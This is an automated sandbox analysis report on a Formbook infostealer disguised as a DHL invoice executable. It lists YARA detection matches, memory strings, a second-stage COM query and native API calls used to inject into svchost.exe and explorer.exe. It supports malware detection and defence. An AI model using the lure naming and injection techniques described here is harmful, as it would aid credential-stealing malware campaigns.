Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2683608489.0000000003640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.1626065993.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: name.exe PID: 3700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 2768, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: name.exe PID: 2100, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6680, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mstsc.exe PID: 4640, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e916afc1-e
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d02c7f73-5
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.1431920314.0000000003791000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_42676e2a-3
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.1431920314.0000000003791000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4349cbd9-b
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000002.00000000.1432252125.00000000006E2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_db035e93-8
Source: name.exe, 00000002.00000000.1432252125.00000000006E2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7da88d46-1
Source: name.exe, 00000009.00000002.1590364793.00000000006E2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_066e17a3-4
Source: name.exe, 00000009.00000002.1590364793.00000000006E2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dedc5070-2

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A330 NtCreateFile,	3_2_0041A330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A3E0 NtReadFile,	3_2_0041A3E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A460 NtClose,	3_2_0041A460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A510 NtAllocateVirtualMemory,	3_2_0041A510
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A3DA NtReadFile,	3_2_0041A3DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A45B NtClose,	3_2_0041A45B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041A50A NtAllocateVirtualMemory,	3_2_0041A50A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72B60 NtClose,LdrInitializeThunk,	3_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AD0 NtReadFile,LdrInitializeThunk,	3_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FE0 NtCreateFile,LdrInitializeThunk,	3_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F90 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FB0 NtResumeThread,LdrInitializeThunk,	3_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F30 NtCreateSection,LdrInitializeThunk,	3_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DD0 NtDelayExecution,LdrInitializeThunk,	3_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C74340 NtSetContextThread,	3_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C74650 NtSuspendThread,	3_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BE0 NtQueryValueKey,	3_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72B80 NtQueryInformationFile,	3_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72BA0 NtEnumerateValueKey,	3_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AF0 NtWriteFile,	3_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72AB0 NtWaitForSingleObject,	3_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72FA0 NtQuerySection,	3_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72F60 NtCreateProcessEx,	3_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72EE0 NtQueueApcThread,	3_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72E30 NtWriteVirtualMemory,	3_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72DB0 NtEnumerateKey,	3_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72D00 NtSetInformationFile,	3_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CC0 NtQueryVirtualMemory,	3_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72CF0 NtOpenProcess,	3_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C60 NtCreateKey,	3_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C70 NtFreeVirtualMemory,	3_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C72C00 NtQueryInformationProcess,	3_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73090 NtSetValueKey,	3_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73010 NtOpenDirectoryObject,	3_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C735C0 NtCreateMutant,	3_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C739B0 NtGetContextThread,	3_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73D70 NtOpenThread,	3_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C73D10 NtOpenProcessToken,	3_2_03C73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	3_2_03BCA036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCA042 NtQueryInformationProcess,	3_2_03BCA042

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0046D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0046D5EB

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_00461201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00461201

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0046E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0046E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0068E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_0068E8F6

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0040BF40	0_2_0040BF40
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00472046	0_2_00472046
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00408060	0_2_00408060
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00468298	0_2_00468298
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0043E4FF	0_2_0043E4FF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0043676B	0_2_0043676B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00494873	0_2_00494873
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0040CAF0	0_2_0040CAF0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0042CAA0	0_2_0042CAA0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0041CC39	0_2_0041CC39
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00436DD9	0_2_00436DD9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0041B119	0_2_0041B119
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004091C0	0_2_004091C0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00421394	0_2_00421394
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00421706	0_2_00421706
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0042781B	0_2_0042781B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0041997D	0_2_0041997D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00407920	0_2_00407920
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_004219B0	0_2_004219B0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00427A4A	0_2_00427A4A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00421C77	0_2_00421C77
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00427CA7	0_2_00427CA7
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0048BE44	0_2_0048BE44
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00439EEE	0_2_00439EEE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00421F32	0_2_00421F32
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_019A3640	0_2_019A3640
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00628060	2_2_00628060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00692046	2_2_00692046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00688298	2_2_00688298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0065E4FF	2_2_0065E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0065676B	2_2_0065676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006B4873	2_2_006B4873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0062CAF0	2_2_0062CAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0064CAA0	2_2_0064CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0063CC39	2_2_0063CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00656DD9	2_2_00656DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0063B119	2_2_0063B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006291C0	2_2_006291C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00641394	2_2_00641394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00641706	2_2_00641706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0064781B	2_2_0064781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0063997D	2_2_0063997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00627920	2_2_00627920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006419B0	2_2_006419B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00647A4A	2_2_00647A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00641C77	2_2_00641C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00647CA7	2_2_00647CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006ABE44	2_2_006ABE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00659EEE	2_2_00659EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_0062BF40	2_2_0062BF40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00641F32	2_2_00641F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_01DE3640	2_2_01DE3640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E0C0	3_2_0041E0C0
